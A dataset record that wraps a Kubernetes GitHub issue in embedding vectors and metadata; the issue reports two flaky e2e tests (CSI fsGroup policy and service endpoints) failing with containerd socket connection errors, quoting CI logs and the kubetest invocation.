0.010749717243015766, 0.04652682691812515, -0.0017385367536917329, -0.0068184565752744675, -0.013659528456628323, -0.00953603908419609, -0.004715250805020332, -0.03398297727108002, 0.012724770233035088, 0.005073323845863342, 0.017504097893834114, 0.005687701050192118, -0.0008070768089964986, -0.008744509890675545, 0.0046737901866436005, 0.0032433841843158007, -0.009407887235283852, 0.021650200709700584, 0.020278217270970345, -0.018273010849952698, 0.002118282252922654, 0.01997668296098709, -0.026293838396668434, -0.0028174661565572023, 0.017066871747374535, 0.0019062655046582222, -0.0035166500601917505, -0.01062910258769989, -0.002636545104905963, -0.021710507571697235, 0.00546154985204339, -0.008970661088824272, 0.005050708539783955, -0.027515053749084473, -0.030409788712859154, -0.012129238806664944, -0.021092360839247704, -0.010229568928480148, 0.005604778882116079, 0.0018440739950165153, 0.014518902637064457, -0.020836057141423225, -0.004308179020881653, -0.016282880678772926, 0.003273537615314126, 0.006614920683205128, -0.01331276260316372, -0.008540973998606205, 0.00851082056760788, -0.02627876028418541, 0.011277402751147747, 0.0026346605736762285, 0.0025159313809126616, -0.0002798620262183249, 0.00209566717967391, -0.012491080909967422, 0.010538642294704914, -0.019283153116703033, -0.00562739372253418, 0.02665567956864834, -0.0048170192167162895, 0.03148023784160614, 0.0019194576889276505, -0.0050544776022434235, 0.005536933429539204, 0.007530832663178444, 0.0027383132837712765, -0.009588807821273804, 0.0029154650401324034, -0.0040330286137759686, -0.004311948083341122, 0.009716959670186043, -0.015219970606267452, 0.00683353329077363, -0.00788513571023941, -0.01090802252292633, 0.003352690488100052, -0.013252455741167068, -0.01010141707956791, 0.0019232268678024411, 0.010214492678642273, 0.01173724327236414, 0.006867455784231424, 0.017504097893834114, 0.018182551488280296, 0.011722167022526264, 0.0015199240297079086, -0.016795489937067032, 0.005416319705545902, -0.0018563237972557545, 0.010712024755775928, -0.01883085072040558, -0.019207768142223358, -0.02260003611445427, 0.0015717503847554326, 0.0064302305690944195, 0.013305224478244781, -0.011194480583071709, 0.006121157202869654, 0.008932969532907009, -0.010335106402635574, 0.021243128925561905, 0.004504176788032055, 0.018212703987956047, -0.0017517289379611611, -0.011820165440440178, 0.022871417924761772, 0.019313305616378784, 0.006588536314666271, 0.022705573588609695, -0.019252998754382133, -0.02278095670044422, -0.03347036615014076, -0.010659256018698215, -0.000964440347161144, -0.006151310633867979, -0.013682142831385136, -0.004523022565990686, -0.0369681715965271, -0.009438040666282177, 0.022615112364292145, 0.013350455090403557, 0.008480667136609554, 0.022584959864616394, 0.008834971114993095, -0.007877597585320473, -0.003984028939157724, 0.009083736687898636, 0.005714084953069687, 0.014639516361057758, -0.018061935901641846, -0.001888361875899136, 0.02125820517539978, -0.00808867160230875, -0.020368678495287895, 0.05433657765388489, 0.01997668296098709, 0.02047421596944332, 0.008631434291601181, 0.0018261703662574291, 0.012068931944668293, -0.00624930951744318, -0.01652410812675953, -0.014187213964760303, 0.014488749206066132, 0.016041653230786324, -0.01154878456145525, 0.014488749206066132, -0.015219970606267452, -0.0004101344966329634, 0.012068931944668293, -0.009747114032506943, 0.005623624660074711, -0.011480938643217087, -0.020564675331115723, -0.008699280209839344, -0.007975596003234386, 0.019132385030388832, -0.01970530115067959, 0.0013229841133579612, 0.008970661088824272, -0.008096210658550262, 0.0008409994770772755, 0.009995879605412483, -0.018725313246250153, 0.021951736882328987, -0.015785349532961845, -0.016433648765087128, 0.0231880284845829, 0.006580997724086046, 0.010139108635485172, 0.014368134550750256, 0.013365531340241432, 0.0055859326384961605, -0.007749445270746946, -0.013991216197609901, 0.0103652598336339, -0.0027967356145381927, 0.0162074975669384, 0.00590631365776062, -0.009912957437336445, 0.0016612685285508633, 0.0037164168898016214, 0.003113347105681896, 0.01614719070494175, 0.015694888308644295, 0.01393090933561325, -0.004425023682415485, 0.00804344192147255, -0.0025328926276415586, -0.00955111626535654, -0.008050980046391487, 0.0013201572000980377, 0.0014718669699504972, -0.02047421596944332, -0.00535978190600872, -0.007361219264566898, -0.01950930431485176, -0.00004970613372279331, -0.02443939819931984, -0.017881015315651894, -0.0006657323683612049, 0.01670503057539463, -0.02394186519086361, 0.012114161625504494, 0.0040254900231957436, 0.008925431407988071, -0.00135596445761621, -0.010357721708714962, -0.01979576237499714, -0.022434191778302193, 0.017473943531513214, -0.011767396703362465, 0.00532208988443017, 0.014398287981748581, -0.004372254945337772, -0.015951192006468773, 0.007063453551381826, -0.005095938686281443, -0.0025385464541614056, -0.009468194097280502, -0.007086068857461214, -0.007779598701745272, -0.013689681887626648, 0.019283153116703033, 0.009226965717971325, 0.005178860854357481, -0.0299574863165617, -0.01994652859866619, 0.006976762320846319, -0.014586747623980045, -0.00009487746137892827, -0.0032075769267976284, 0.0014775206800550222, 0.01570996455848217, 0.008940507657825947, 0.02356494776904583, -0.02896242029964924, -0.003686263458803296, 0.013041381724178791, -0.021740661934018135, 0.0070144543424248695, -0.017398560419678688, -0.00838266871869564, -0.0036655329167842865, 0.006060850340873003, -0.0008466533035971224, -0.024710780009627342, 0.0010261607822030783, 0.017262868583202362, -0.0010336991399526596, 0.0024518552236258984, 0.002065513515844941, 0.019524380564689636, 0.0025611615274101496, -0.0070069157518446445, -0.0005111958016641438, 0.019554534927010536, 0.014858129434287548, 0.007609985303133726, -0.011186942458152771, 0.006049542687833309, 0.024288630113005638, 0.006927762646228075, 0.01407413836568594, -0.0023595101665705442, -0.021650200709700584, 0.015634581446647644, 0.0033677672035992146, 0.00528439786285162, 0.003987798001617193, -0.010410490445792675, 0.02023298665881157, 0.02169543132185936, 0.009845112450420856, -0.005472857039421797, 0.041973650455474854, -0.004492869134992361, 0.009950649924576283, -0.009822497144341469, 0.006614920683205128, -0.013177072629332542, -0.0033036910463124514, 0.0021484356839209795, -0.026535065844655037, 0.0054427036084234715, 0.007274528034031391, 0.011428169906139374, -0.0023896635975688696, -0.0030624631326645613, -0.006739303469657898, 0.01773024909198284, 0.01770009472966194, -0.009596345946192741, 0.006577228661626577, -0.006204079370945692, 0.0011401786468923092, -0.0031095780432224274, 0.01947914995253086, 0.0019241691334173083, 0.007052145898342133, -0.0007043665391393006, -0.006407615263015032, 0.011179404333233833, -0.008910354226827621, -0.01766994222998619, -0.003314998699352145, 0.004210180137306452, -0.008118825033307076, 0.014880743809044361, 0.014157060533761978, 0.013199687004089355, -0.0023557408712804317, 0.017066871747374535, 0.018242858350276947, 0.017896093428134918, 0.0004638453829102218, -0.019433919340372086, 0.0137952184304595, 0.04227518290281296, 0.005506779998540878, -0.0029041573870927095, -0.01577027142047882, 0.012491080909967422, 0.021936658769845963, -0.0036768403369933367, -0.02459016628563404, 0.016659799963235855, -0.012845383957028389, -0.010892946273088455, 0.02213265746831894, 0.016041653230786324, -0.0034299588296562433, 0.023519717156887054, -0.01228000596165657, -0.0025705844163894653, -0.023836329579353333, -0.028419658541679382, 0.023293565958738327 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### Which jobs are flaking? master-blocking: - gce-cos-master-default ### Which tests are flaking? 1. `Kubernetes e2e suite.[It] [sig-storage] CSI Mock volume fsgroup policies CSI FSGroupPolicy Update [LinuxOnly] should update fsGroup if update from File to default.` 2. `Kubernetes e2e suite.[It] [sig-network] Networking Granular Checks: Services should update endpoints: http` ### Since when has it been flaking? This test is only failed **once** recently on 31/05/2024 - https://prow.k8s.io/view/gs/kubernetes-jenkins/logs/ci-kubernetes-e2e-ubuntu-gce-containerd/1796412325301850112 ### Testgrid link https://testgrid.k8s.io/sig-release-master-blocking#gce-ubuntu-master-containerd ### Reason for failure (if possible) **02 test seem failed with the same reason related to containerd socket.** ``` { failed [FAILED] failed: writing the contents: unable to upgrade connection: rpc error: code = Unavailable desc = connection error: desc = "transport: Error while dialing: dial unix /run/containerd/containerd.sock: connect: no such file or directory": unable to upgrade connection: rpc error: code = Unavailable desc = connection error: desc = "transport: Error while dialing: dial unix /run/containerd/containerd.sock: connect: no such file or directory" In [It] at: k8s.io/kubernetes/test/e2e/storage/csimock/csi_fsgroup_policy.go:175 @ 05/31/24 05:40:11.726 } ``` Related to behavior of CSI Mock volumes when updating FSGroup policies. Seems like storage issue (?) ``` [FAIL] [sig-storage] CSI Mock volume fsgroup policies CSI FSGroupPolicy Update [LinuxOnly] [It] should update fsGroup if update from File to default [sig-storage] k8s.io/kubernetes/test/e2e/storage/csimock/csi_fsgroup_policy.go:175 ``` ``` 2024/05/31 06:04:10 main.go:326: Something went wrong: encountered 1 errors: [error during ./hack/ginkgo-e2e.sh --ginkgo.skip=\[Driver:.gcepd\]|\[Slow\]|\[Serial\]|\[Disruptive\]|\[Flaky\]|\[Feature:.+\] --minStartupPods=8 --report-dir=/logs/artifacts --disable-log-dump=true --cluster-ip-range=10.64.0.0/14: exit status 1] ``` ``` subprocess.CalledProcessError: Command '('kubetest', '--dump=/logs/artifacts', '--gcp-service-account=/etc/service-account/service-account.json', '--up', '--down', '--test', '--provider=gce', '--cluster=bootstrap-e2e', '--gcp-network=bootstrap-e2e', '--check-leaked-resources', '--extract=ci/fast/latest-fast', '--extract-ci-bucket=k8s-release-dev', '--gcp-master-image=ubuntu', '--gcp-node-image=ubuntu', '--gcp-nodes=4', '--gcp-zone=us-west1-b', '--ginkgo-parallel=30', '--test_args=--ginkgo.skip=\\[Driver:.gcepd\\]|\\[Slow\\]|\\[Serial\\]|\\[Disruptive\\]|\\[Flaky\\]|\\[Feature:.+\\] --minStartupPods=8', '--timeout=50m')' returned non-zero exit status 1. ``` ### Anything else we need to know? Check this issue if you want to review the history performance of `Networking Granular Checks: Services should update endpoints: http` test: https://github.com/kubernetes/kubernetes/issues/123760 ### Relevant SIG(s) /sig cloud-provider /sig storage @kubernetes/release-team-release-signal
[Flaking Test] gce-cos-master-default (containerd socket errors)
https://api.github.com/repos/kubernetes/kubernetes/issues/125228/comments
9
2024-05-31T07:48:56
2024-07-17T16:27:07Z
https://github.com/kubernetes/kubernetes/issues/125228
2,327,179,489
125,228
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : [Flaking Test] gce-cos-master-default (containerd socket errors) Issue date: --- start body --- ### Which jobs are flaking? master-blocking: - gce-cos-master-default ### Which tests are flaking? 1. `Kubernetes e2e suite.[It] [sig-storage] CSI Mock volume fsgroup policies CSI FSGroupPolicy Update [LinuxOnly] should update fsGroup if update from File to default.` 2. `Kubernetes e2e suite.[It] [sig-network] Networking Granular Checks: Services should update endpoints: http` ### Since when has it been flaking? This test is only failed **once** recently on 31/05/2024 - https://prow.k8s.io/view/gs/kubernetes-jenkins/logs/ci-kubernetes-e2e-ubuntu-gce-containerd/1796412325301850112 ### Testgrid link https://testgrid.k8s.io/sig-release-master-blocking#gce-ubuntu-master-containerd ### Reason for failure (if possible) **02 test seem failed with the same reason related to containerd socket.** ``` { failed [FAILED] failed: writing the contents: unable to upgrade connection: rpc error: code = Unavailable desc = connection error: desc = "transport: Error while dialing: dial unix /run/containerd/containerd.sock: connect: no such file or directory": unable to upgrade connection: rpc error: code = Unavailable desc = connection error: desc = "transport: Error while dialing: dial unix /run/containerd/containerd.sock: connect: no such file or directory" In [It] at: k8s.io/kubernetes/test/e2e/storage/csimock/csi_fsgroup_policy.go:175 @ 05/31/24 05:40:11.726 } ``` Related to behavior of CSI Mock volumes when updating FSGroup policies. Seems like storage issue (?) ``` [FAIL] [sig-storage] CSI Mock volume fsgroup policies CSI FSGroupPolicy Update [LinuxOnly] [It] should update fsGroup if update from File to default [sig-storage] k8s.io/kubernetes/test/e2e/storage/csimock/csi_fsgroup_policy.go:175 ``` ``` 2024/05/31 06:04:10 main.go:326: Something went wrong: encountered 1 errors: [error during ./hack/ginkgo-e2e.sh --ginkgo.skip=\[Driver:.gcepd\]|\[Slow\]|\[Serial\]|\[Disruptive\]|\[Flaky\]|\[Feature:.+\] --minStartupPods=8 --report-dir=/logs/artifacts --disable-log-dump=true --cluster-ip-range=10.64.0.0/14: exit status 1] ``` ``` subprocess.CalledProcessError: Command '('kubetest', '--dump=/logs/artifacts', '--gcp-service-account=/etc/service-account/service-account.json', '--up', '--down', '--test', '--provider=gce', '--cluster=bootstrap-e2e', '--gcp-network=bootstrap-e2e', '--check-leaked-resources', '--extract=ci/fast/latest-fast', '--extract-ci-bucket=k8s-release-dev', '--gcp-master-image=ubuntu', '--gcp-node-image=ubuntu', '--gcp-nodes=4', '--gcp-zone=us-west1-b', '--ginkgo-parallel=30', '--test_args=--ginkgo.skip=\\[Driver:.gcepd\\]|\\[Slow\\]|\\[Serial\\]|\\[Disruptive\\]|\\[Flaky\\]|\\[Feature:.+\\] --minStartupPods=8', '--timeout=50m')' returned non-zero exit status 1. ``` ### Anything else we need to know? Check this issue if you want to review the history performance of `Networking Granular Checks: Services should update endpoints: http` test: https://github.com/kubernetes/kubernetes/issues/123760 ### Relevant SIG(s) /sig cloud-provider /sig storage @kubernetes/release-team-release-signal --- end body ---
3,278
[ -0.017775077372789383, 0.0006191329448483884, -0.005412145517766476, 0.01314121950417757, 0.03586577624082565, -0.0036798284854739904, -0.03204965591430664, 0.018908435478806496, 0.0011746041709557176, -0.03922281041741371, -0.007617890369147062, 0.0008087732130661607, -0.002899747807532549, 0.007790046278387308, -0.012366519309580326, 0.007151635363698006, -0.021734658628702164, 0.005469530820846558, -0.007696795277297497, -0.022337203845381737, -0.009382486343383789, 0.0009603060898371041, 0.0059106796979904175, 0.0061043547466397285, 0.031762730330228806, -0.0006536537548527122, 0.004759388510137796, -0.00010053625010186806, -0.031934887170791626, 0.013449665158987045, -0.015034932643175125, 0.01404503732919693, 0.004325412213802338, 0.03526322916150093, 0.05376996845006943, -0.008184569887816906, 0.00814870372414589, 0.03600923717021942, -0.01560878474265337, -0.02104603685438633, -0.04702720418572426, -0.04306762292981148, -0.006789390929043293, 0.034545913338661194, -0.004224988166242838, -0.002734765410423279, 0.025292543694376945, 0.0029947920702397823, -0.02289671078324318, -0.03015594370663166, -0.025780318304896355, -0.04886353015899658, -0.014016345143318176, -0.06983783841133118, 0.009612027555704117, -0.01694299280643463, 0.07110030949115753, 0.026095937937498093, -0.0006644134991802275, -0.0022756834514439106, 0.005078593734651804, 0.01870758831501007, -0.04808882996439934, 0.016211330890655518, 0.01928143948316574, 0.035291921347379684, -0.043297164142131805, 0.026913676410913467, -0.03796033561229706, -0.03606662154197693, -0.026841945946216583, 0.013184258714318275, 0.010487152263522148, 0.04223553463816643, 0.032508738338947296, -0.03847680240869522, 0.008399764075875282, 0.01547966804355383, -0.04235030710697174, -0.029467320069670677, -0.03689870983362198, 0.03557884693145752, -0.02100299671292305, 0.03437375649809837, 0.0187506265938282, -0.0001556798815727234, -0.021863775327801704, -0.07396957278251648, 0.0013575195334851742, -0.0052794418297708035, 0.003808945184573531, 0.021777698770165443, 0.013105354271829128, -0.048633988946676254, -0.004339758772403002, -0.020113525912165642, -0.011885917745530605, 0.00898079015314579, -0.06220559775829315, 0.008858846500515938, -0.03445983678102493, 0.0002373866009293124, 0.005046314559876919, -0.014210020191967487, 0.02540731430053711, -0.005089353304356337, 0.00979852955788374, 0.0028316029347479343, 0.023657064884901047, 0.1268213838338852, 0.018334584310650826, 0.0028244296554476023, -0.016885606572031975, -0.021605541929602623, -0.06163174659013748, 0.012495636008679867, 0.011505740694701672, 0.02311190590262413, -0.019611405208706856, -0.02972555346786976, -0.02398703061044216, -0.03468937799334526, -0.017459459602832794, -0.01294754445552826, -0.01889408938586712, 0.012847120873630047, 0.006427146960049868, 0.00986308790743351, -0.03698478639125824, -0.020902574062347412, -0.016756489872932434, -0.007460081018507481, -0.009554642252624035, -0.02773141674697399, 0.03268089517951012, -0.024991272017359734, -0.03930889070034027, 0.06564871221780777, -0.008944923989474773, 0.001972617581486702, -0.0139087475836277, -0.021419040858745575, 0.023929644376039505, 0.004002620466053486, -0.0177033469080925, -0.020285682752728462, 0.0037874258123338223, 0.015436629764735699, 0.010157187469303608, 0.013722245581448078, -0.029610782861709595, -0.035779695957899094, 0.007452907972037792, 0.022523706778883934, 0.02319798246026039, -0.04499002918601036, 0.02496257983148098, -0.00366548215970397, -0.007510293275117874, -0.015149703249335289, 0.011075351387262344, -0.017445113509893417, 0.004755801521241665, -0.00468765664845705, 0.0022720969282090664, 0.003744386835023761, 0.004820359870791435, 0.0049996888265013695, -0.04143214225769043, 0.018506739288568497, 0.015178395435214043, -0.01206524670124054, 0.0025464699137955904, 0.020285682752728462, -0.04137475788593292, -0.01164920348674059, -0.012294787913560867, 0.04094436764717102, 0.03635355085134506, 0.00569189852103591, -0.02298278920352459, 0.05595060810446739, 0.007811565883457661, -0.002193192020058632, 0.021332962438464165, -0.04926522821187973, -0.011986342258751392, -0.008650824427604675, -0.027932265773415565, -0.02192116156220436, 0.03098803013563156, -0.02117515355348587, 0.013456838205456734, -0.025019964203238487, -0.03121756948530674, 0.0032601989805698395, -0.0007433181745000184, 0.026210708543658257, 0.01136227697134018, -0.04232161492109299, 0.022911056876182556, -0.0033516567200422287, -0.03523453697562218, -0.03161926567554474, -0.006627995055168867, 0.002144773257896304, -0.011699415743350983, 0.03557884693145752, 0.032336581498384476, -0.028463078662753105, -0.05534806475043297, 0.00816305074840784, 0.007775699719786644, 0.0012275060871616006, 0.010121321305632591, 0.030528947710990906, 0.010472806170582771, 0.053970817476511, -0.04174776002764702, -0.027415798977017403, 0.04272330924868584, -0.012029380537569523, 0.009884607046842575, -0.0009692725725471973, -0.034804146736860275, -0.008442803286015987, 0.02928081899881363, -0.026296785101294518, -0.012531501241028309, -0.00931075494736433, 0.013851362280547619, -0.011075351387262344, 0.02012787200510502, 0.020199604332447052, -0.011598991230130196, -0.01568051613867283, -0.026210708543658257, -0.01164920348674059, -0.01951098069548607, -0.030442869290709496, 0.04318239167332649, 0.004770148079842329, -0.053683891892433167, -0.03979666531085968, -0.017488151788711548, 0.010257611982524395, 0.008837326429784298, 0.026311133056879044, 0.00003191493669874035, 0.010723866522312164, -0.023843567818403244, -0.004196295514702797, -0.01994137093424797, -0.0005666792276315391, 0.03144711256027222, 0.006391281262040138, 0.00039676512824371457, 0.005760043393820524, 0.033139973878860474, 0.0021878122352063656, 0.023585332557559013, 0.03666916862130165, -0.02108907513320446, -0.005666792392730713, 0.00011622752936091274, -0.018650202080607414, -0.02223677933216095, 0.031504496932029724, 0.01138379704207182, -0.013241644017398357, 0.005430078133940697, 0.004131737165153027, -0.014583024196326733, -0.014317616820335388, -0.019883984699845314, -0.019037554040551186, -0.013471185229718685, 0.002426319755613804, -0.003927302546799183, 0.02668413706123829, 0.03618139401078224, -0.03121756948530674, -0.0037372137885540724, -0.006251404527574778, -0.03222181275486946, 0.016885606572031975, 0.03586577624082565, -0.03821856901049614, -0.019037554040551186, -0.006656687706708908, -0.01624002307653427, -0.019424904137849808, 0.017244264483451843, 0.011283372528851032, 0.004124564118683338, -0.012230229564011097, 0.00010300202120561153, 0.05451597645878792, 0.000028594549803528935, -0.01642652414739132, -0.026009859517216682, -0.01629740744829178, 0.01499189343303442, -0.014088076539337635, 0.0011737074237316847, -0.013270336203277111, -0.009260542690753937, 0.03270958736538887, 0.0064414930529892445, -0.02659805864095688, -0.003414421807974577, -0.05331088602542877, -0.011441182345151901, -0.038763727992773056, 0.008105665445327759, 0.00394164863973856, 0.04777321219444275, -0.03813249245285988, -0.02975424751639366, -0.029467320069670677, 0.025392968207597733, 0.009619200602173805, -0.02015656605362892, 0.028592195361852646, 0.0164695642888546, -0.053339578211307526, 0.022222433239221573, 0.010071109049022198, -0.057528700679540634, -0.008550400845706463, 0.013270336203277111, -0.01932447962462902, -0.01738772727549076, -0.024316994473338127, 0.013808323070406914, -0.04564995691180229, -0.0716167762875557, 0.017904194071888924, 0.02928081899881363, -0.010035243816673756, 0.011269026435911655, -0.015264473855495453, -0.031274955719709396, -0.00045168460928834975, 0.02126123197376728, 0.018391968682408333, 0.005501809995621443, 0.0023814875166863203, 0.0232840608805418, -0.012201536446809769, 0.0010015517473220825, -0.005336827132850885, -0.02100299671292305, -0.023255368694663048, 0.021562503650784492, -0.016440870240330696, -0.015867019072175026, 0.014733660034835339, 0.0436701662838459, -0.018191121518611908, 0.03767341002821922, -0.06048404052853584, -0.02875000424683094, 0.045764729380607605, 0.009102733805775642, -0.013994825072586536, -0.011010793037712574, 0.005491049960255623, -0.0038161184638738632, -0.0290512777864933, -0.051933642476797104, 0.05379866063594818, 0.006219125352799892, 0.013994825072586536, 0.007201847620308399, -0.027401451021432877, -0.0024065934121608734, 0.015106664039194584, -0.03288174048066139, 0.026971062645316124, -0.019080592319369316, -0.018248505890369415, 0.009977858513593674, -0.03305389732122421, 0.006678207311779261, 0.04590819031000137, 0.00609718170017004, 0.04513349011540413, 0.012050900608301163, 0.0017072109039872885, -0.03517715260386467, 0.038677651435136795, -0.04051397740840912, -0.0025357103440910578, -0.003238679375499487, -0.0003066523640882224, -0.0094685647636652, -0.027329720556735992, 0.008356725797057152, -0.014403695240616798, 0.015221434645354748, 0.041891224682331085, 0.0031687412410974503, 0.04275200515985489, -0.03121756948530674, 0.02083084173500538, -0.006947200745344162, -0.01384418923407793, 0.004343345295637846, -0.003959581721574068, 0.02100299671292305, -0.00695437379181385, 0.006014690268784761, -0.03351297974586487, 0.051847562193870544, 0.05618014931678772, 0.02958209067583084, -0.005017621908336878, -0.016627373173832893, 0.024733038619160652, -0.018592817708849907, 0.003376762615516782, 0.03265220299363136, 0.012359346263110638, 0.014848430640995502, 0.000874228251632303, 0.02289671078324318, 0.036382243037223816, 0.02689933031797409, -0.02649763412773609, -0.03443114459514618, -0.007589197717607021, 0.013743764720857143, 0.005433664657175541, -0.019496634602546692, -0.031102798879146576, 0.01817677542567253, -0.025077350437641144, 0.019051900133490562, 0.004135323688387871, -0.007460081018507481, 0.042637232691049576, -0.010508672334253788, 0.017029069364070892, -0.0366404764354229, -0.03824726119637489, -0.05256487801671028, 0.006283683702349663, -0.022566745057702065, -0.0362674705684185, -0.0399688184261322, 0.035779695957899094, -0.024976925924420357, 0.001668655197136104, -0.0247043464332819, -0.012380865402519703, 0.012560194358229637, -0.028362654149532318, 0.02981163188815117, 0.022523706778883934, 0.02068737894296646, 0.0047020032070577145, 0.005634513217955828, 0.01322729792445898, -0.005523329135030508, -0.0008979893173091114, 0.0023223089519888163, -0.0766092911362648, 0.015264473855495453, -0.039337582886219025, 0.027630992233753204, 0.020572608336806297, -0.011591818183660507, 0.029926402494311333, 0.009490083903074265, 0.012266094796359539, 0.013105354271829128, -0.026655443012714386, 0.010752559639513493, -0.005387039389461279, -0.0011324618244543672, 0.012732350267469883, 0.010874503292143345, 0.01507797185331583, -0.022925402969121933, -0.023829219862818718, -0.00394164863973856, -0.015623131766915321, -0.03623877838253975, 0.01027913112193346, 0.046338580548763275, -0.012976237572729588, -0.00400620698928833, -0.023083211854100227, 0.003895023139193654, -0.013062315061688423, 0.01730164885520935, -0.0003391557256691158, 0.02351360209286213, -0.03781687095761299, 0.023872260004281998, -0.001270545064471662, 0.02051522396504879, 0.013643340207636356, -0.009052521549165249, -0.028147459030151367, 0.03853418678045273, 0.043125007301568985, -0.021806390956044197, -0.008571919985115528, -0.04051397740840912, 0.002654067240655422, 0.03721432760357857, 0.016483910381793976, 0.009705279022455215, -0.0005187087808735669, 0.0065885428339242935, 0.004956650082021952, 0.022208087146282196, 0.056811388581991196, -0.01755988411605358, -0.04869137704372406, 0.02126123197376728, 0.04579342156648636, -0.010228918865323067, 0.002284649759531021, 0.023800527676939964, -0.002142979996278882, 0.01258888654410839, -0.015207088552415371, 0.003920129034668207, 0.00005438708467409015, -0.004020553547888994, 0.033656444400548935, -0.0036242364440113306, -0.012603233568370342, 0.009805702604353428, -0.0036421692930161953, -0.006656687706708908, -0.024058761075139046, -0.018205467611551285, 0.0236857570707798, -0.049724310636520386, -0.015651823952794075, -0.0201709121465683, 0.02051522396504879, -0.022523706778883934, 0.014030691236257553, 0.013664860278367996, -0.013356414623558521, 0.0070619708858430386, -0.019467942416667938, 0.01342814601957798, 0.03494761139154434, -0.01102513913065195, -0.04797406122088432, 0.03227919712662697, 0.008320859633386135, 0.0025339170824736357, -0.006681793835014105, -0.022165048867464066, 0.006326722446829081, -0.0033695895690470934, -0.025593817234039307, -0.0028943680226802826, -0.02095995843410492, -0.006011103745549917, -0.00005721711931983009, -0.012180017307400703, -0.017889847978949547, 0.04415794089436531, -0.027085833251476288, 0.0075748516246676445, -0.04877745360136032, 0.004372037947177887, 0.01761726848781109, 0.00304859085008502, -0.014410868287086487, -0.02298278920352459, -0.017846809700131416, 0.004483222030103207, -0.005975238047540188, -0.03658308833837509, -0.009705279022455215, 0.011785493232309818, -0.01672779768705368, 0.03253743052482605, 0.00850018858909607, -0.013277510181069374, -0.027630992233753204, 0.01691429875791073, -0.0010625235736370087, -0.010666481219232082, 0.00565603282302618, 0.04051397740840912, -0.025206467136740685, -0.013177085667848587, 0.0017825289396569133, 0.019496634602546692, 0.025995513424277306, 0.03649701178073883, 0.030615024268627167, 0.011233160272240639, -0.04714197292923927, -0.0007639409741386771, 0.039595816284418106, -0.003131082048639655, 0.011419662274420261, -0.015666170045733452, 0.02139034867286682, 0.01761726848781109, 0.018865397199988365, 0.04235030710697174, -0.01593874953687191, 0.0017959786346182227, 0.0026146150194108486, 0.037931643426418304, 0.014905815944075584, 0.01021457277238369, 0.0038699170108884573, 0.037185635417699814, -0.00910990685224533, 0.05288049951195717, -0.017818117514252663, 0.029123008251190186, 0.028276577591896057, -0.0007298685377463698, -0.01294754445552826, -0.00627292413264513, -0.013234470970928669, -0.013385106809437275, -0.0020712483674287796, -0.01089602243155241, -0.018248505890369415, -0.017732039093971252, -0.008026760071516037, 0.02966816909611225, -0.008198915980756283, -0.035464078187942505, -0.03248004615306854, -0.027100179344415665, -0.003050384111702442, 0.01761726848781109, 0.03569361940026283, -0.03437375649809837, 0.00017888055299408734, -0.03351297974586487, 0.021246884018182755, 0.00011611544323386624, 0.03204965591430664, -0.009755490347743034, 0.016254369169473648, -0.028061382472515106, 0.04395709186792374, 0.016670411452651024, -0.008808634243905544, 0.03615270182490349, 0.027085833251476288, 0.006118701305240393, 0.004637444857507944, -0.02042914554476738, -0.012567367404699326, -0.010329343378543854, -0.007646583020687103, 0.03618139401078224, 0.010910368524491787, -0.00033489667112007737, -0.0035991305485367775, -0.03411552309989929, 0.021189499646425247, -0.015221434645354748, 0.007969374768435955, -0.02253805287182331, -0.02562250941991806, 0.002670206828042865, -0.004762975033372641, -0.013377933762967587, 0.01142683532088995, 0.006882641930133104, 0.010881676338613033, -0.007962201721966267, -0.027415798977017403, -0.021634235978126526, 0.016168290749192238, -0.0005944751901552081, 0.028362654149532318, -0.004712762776762247, 0.01556574646383524, -0.004544193856418133, -0.01932447962462902, -0.008371071889996529, 0.007345310412347317, -0.01261040661484003, -0.02060130052268505, 0.0066459281370043755, 0.014618889428675175, -0.0034484942443668842, -0.0203861054033041, 0.01199351530522108, 0.006818083580583334, -0.004927957430481911, 0.027372758835554123, -0.013679206371307373, 0.02258109115064144, -0.005835361313074827, 0.019080592319369316, -0.007538985926657915, -0.0051288059912621975, -0.007187501061707735, 0.02981163188815117, -0.01258888654410839, -0.0523066446185112, -0.021906815469264984, 0.01800461858510971, -0.021074729040265083, 0.012983410619199276, -0.021777698770165443, -0.0025231572799384594, -0.013894401490688324, -0.0034323546569794416, -0.018463701009750366, 0.005562781821936369, -0.017143839970231056, -0.052105795592069626, -0.0337999053299427, 0.0006218228954821825, 0.021074729040265083, 0.027401451021432877, -0.021806390956044197, 0.009002309292554855, 0.011921783909201622, -0.007689622230827808, -0.009131425991654396, 0.0026415144093334675, 0.00451191421598196, 0.0018829532200470567, 0.0015350551111623645, 0.00486339908093214, 0.03715694323182106, -0.010774078778922558, 0.022925402969121933, -0.03971058502793312, -0.005530502647161484, 0.009031002409756184, 0.009382486343383789, -0.007703968323767185, 0.01883670501410961, 0.006757111754268408, 0.008557573892176151, -0.02351360209286213, -0.00565603282302618, 0.016569986939430237, -0.045018721371889114, -0.036956094205379486, -0.005257922690361738, -0.0179185401648283, 0.03173403814435005, -0.012380865402519703, 0.009690931998193264, -0.006671034265309572, 0.012804081663489342, 0.006653101183474064, 0.004813186824321747, 0.0027526982594281435, 0.0245178434997797, 0.01624002307653427, 0.011548778973519802, -0.032164428383111954, -0.005738523788750172, 0.017990272492170334, -0.002709659282118082, 0.005229230038821697, -0.056294918060302734, -0.020974304527044296, 0.03724301978945732, 0.020974304527044296, -0.017574230208992958, -0.022179394960403442, 0.0021591195836663246, 0.00434693181887269, -0.016569986939430237, -0.011706588789820671, -0.01624002307653427, 0.02395833656191826, -0.011491394601762295, -0.0014328376855701208, 0.03305389732122421, -0.018564125522971153, -0.010164360515773296, 0.023413177579641342, -0.051044169813394547, -0.01200068835169077, 0.029036931693553925, -0.016627373173832893, 0.03182011470198631, -0.019668791443109512, -0.033168669790029526, 0.02443176507949829, -0.015823978930711746, -0.020185258239507675, 0.005745697300881147, 0.00253212358802557, 0.013808323070406914, -0.0013368967920541763, -0.01753119006752968, -0.005164671689271927, -0.003127495525404811, -0.007122942712157965, -0.016369139775633812, 0.006753525231033564, -0.007438561879098415, -0.02187812328338623, -0.017072109505534172, 0.010788424871861935, 0.00010810168896568939, -0.01606786623597145, -0.0006088215159252286, 0.019654445350170135, -0.0010078282793983817, 0.023786181584000587, -0.022753247991204262, 0.0189371295273304, 0.014762353152036667, 0.021734658628702164, 0.015780940651893616, -0.003991860896348953, 0.014683447778224945, -0.03032809868454933, 0.044186633080244064, 0.014145461842417717, 0.008937750943005085, -0.009748317301273346, -0.029955094680190086, 0.00371569418348372, -0.01619698293507099, 0.02768837846815586, 0.017717693001031876, -0.0064414930529892445, 0.003477186895906925, 0.03113149292767048, 